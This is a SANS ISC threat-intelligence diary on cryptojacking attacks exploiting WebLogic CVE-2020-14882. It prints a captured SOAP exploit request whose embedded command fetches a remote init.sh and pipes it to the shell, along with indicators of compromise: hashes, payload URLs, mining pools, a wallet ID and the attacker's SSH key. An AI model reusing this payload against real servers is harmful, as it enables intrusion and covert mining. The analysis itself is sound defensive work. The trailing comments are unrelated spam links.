Cryptojacking Targeting WebLogic TCP/7001

Published: 2020-11-07
Last Updated: 2020-11-07 23:30:52 UTC
by Guy Bruneau (Version: 1)
0 comment(s)

This past week got some interesting logs targeting TCP/7001 (WebLogic CVE-2020-14882 - see previous diary[1][2]) looking to download and launch a shell script to install various cryptominer on the target. The shell script target SELINUX compatible hosts likely CentOS/RedHat, Ubuntu, etc to install various cryptominer applications.

If successful, the script installs a SSH authorized_key (see below) in the root account to provide access to the host after it has been compromised. If using WebLogic, the current advisory for CVE-2020-14882 is published here.

Log Example

20201106-073608: 192.168.25.9:7001-223.240.104.222:60620 data 'POST /wls-wsat/CoordinatorPortType11 HTTP/1.1\r\nHost: XX.XX.122.14:7001\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)\r\nContent-Length: 611\r\nConnection: close\r\nContent-Type: text/xml\r\nAccept-Encoding: gzip\r\n\r\n<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.XMLDecoder"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>cd1 -fsSL http://45.9.148[.]37/b2f628fff19fda999999999/init.sh |sh</string> </void> </array> <void method="start"/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'

Indicator of compromise

MD5
3112fb090700ed03755ffc84f552080a  init.sh
02e43830f8b1528c1aed200828f78e2d  config.json
3112fb090700ed03755ffc84f552080a  newsvc.sh
36971b02377bda17e29c75cd6194ebad  svcguard
149c79bf71a54ec41f6793819682f790  svcupdate
8ef6437f966f1cc7c78f443a17968a10  svcworkmanager

SHA256
bdd467bce95969caeb5963ba817036e0123253a992ad5a0f4815c7e980bcfb10  init.sh and newsvc.sh
29996267aba0bd7739037639b857dcefff8b5d7c79f54780e9cbf607979f7eba  config.json
e38c1f4eef131aa74fad40ea39d95ef298e39f6c6690ac6b9eac77307f535056  svcguard
e7446d595854b6bac01420378176d1193070ef776788af12300eb77e0a397bf7  svcupdate
d3466a191b5185a4007faf8949117df5c77907eea9121c7e8308f2a5a736b3fc  svcworkmanager

Initial Download
http://45.9.148[.]37/b2f628fff19fda999999999/init.sh
http://45.9.148[.]37/E5DB0E07C3D7BE80V201007/init.sh
http://global.bitmex.com[.]de/b2f627fff19fda/init.sh
http://185.181.10[.]234/E5DB0E07C3D7BE80V520/init.sh

File Download
http://103.125.218[.]107/b2f628/newsvc.sh"
http://45.9.148[.]37/b2f628fff19fda999999999/newsvc.sh"
http://103.125.218[.]107/b2f628/config.json"
http://45.9.148[.]37/b2f628fff19fda999999999/config.json"
http://103.125.218[.]107/b2f628/svcworkmanager"
http://45.9.148[.]37/b2f628fff19fda999999999/svcworkmanager"
http://103.125.218[.]107/b2f628/svcguard"
http://45.9.148[.]37/b2f628fff19fda999999999/svcguard"
http://update.aegis.aliyun[.]com/download/uninstall.sh
http://update.aegis.aliyun[.]com/download/quartz_uninstall.sh

Currently Unavailable
http://103.125.218[.]107/b2f628/iplog.php
http://45.9.148[.]37/b2f628fff19fda999999999/iplog.php
http://103.125.218[.]107/b2f628/iplog.php
http://45.9.148[.]37/b2f628fff19fda999999999/iplog.php

Bitcoin Mining Pool

xmr.f2pool[.]com:13531
xmr-eu2.nanopool[.]org:14444
randomxmonero.hk.nicehash[.]com:3380

User ID in config.json

"user": "43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfNYzyfSbbrwoR.vsyd"

SSH authorized_keys

"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfg
O06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfs
xXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+Kl2yXiHN5oD9BVTkdIWX root@u17"

[1] https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/
[2] https://isc.sans.edu/forums/diary/Attackers+Exploiting+WebLogic+Servers+via+CVE202014882+to+install+Cobalt+Strike/26752/
[3] https://www.virustotal.com/gui/file/bdd467bce95969caeb5963ba817036e0123253a992ad5a0f4815c7e980bcfb10/detection
[4] https://www.virustotal.com/gui/file/29996267aba0bd7739037639b857dcefff8b5d7c79f54780e9cbf607979f7eba/detection
[5] https://www.virustotal.com/gui/file/e38c1f4eef131aa74fad40ea39d95ef298e39f6c6690ac6b9eac77307f535056/detection
[6] https://www.virustotal.com/gui/file/e7446d595854b6bac01420378176d1193070ef776788af12300eb77e0a397bf7/detection
[7] https://www.virustotal.com/gui/file/d3466a191b5185a4007faf8949117df5c77907eea9121c7e8308f2a5a736b3fc/detection
[8] https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/Coinminer.Linux.MALXMR.UWEJJ
[9] https://www.oracle.com/security-alerts/alert-cve-2020-14750.html#AppendixFMWl

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

0 comment(s)

Comments

What's this all about ..?
password reveal .
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure:

<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.

<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
https://thehomestore.com.pk/
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
https://defineprogramming.com/
https://defineprogramming.com/
Enter comment here... a fake TeamViewer page, and that page led to a different type of malware. This week's infection involved a downloaded JavaScript (.js) file that led to Microsoft Installer packages (.msi files) containing other script that used free or open source programs.
distribute malware. Even if the URL listed on the ad shows a legitimate website, subsequent ad traffic can easily lead to a fake page. Different types of malware are distributed in this manner. I've seen IcedID (Bokbot), Gozi/ISFB, and various information stealers distributed through fake software websites that were provided through Google ad traffic. I submitted malicious files from this example to VirusTotal and found a low rate of detection, with some files not showing as malware at all. Additionally, domains associated with this infection frequently change. That might make it hard to detect.
https://clickercounter.org/
Enter corthrthmment here...

Diary Archives